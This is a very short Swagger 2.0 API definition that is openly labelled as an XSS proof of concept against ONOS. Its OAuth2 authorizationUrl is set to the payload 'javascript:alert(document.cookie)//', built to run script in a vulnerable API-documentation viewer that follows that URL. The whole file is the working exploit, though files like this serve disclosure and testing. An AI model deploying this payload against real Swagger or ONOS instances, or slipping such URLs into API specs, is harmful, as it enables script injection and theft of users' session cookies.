swagger: "2.0"
info:
  title: edoardottt XSS
  description: XSS ONOS POC
  version: 1.0.0
host: edoardottt.com
basePath: /v1
schemes:
  - https

securityDefinitions:
  OAuth2:
    type: oauth2
    flow: accessCode
    authorizationUrl: javascript:alert(document.cookie)//
    tokenUrl: https://example.com/oauth/token
    scopes:
      read: Grants read access
      write: Grants write access
      admin: Grants read and write access to administrative information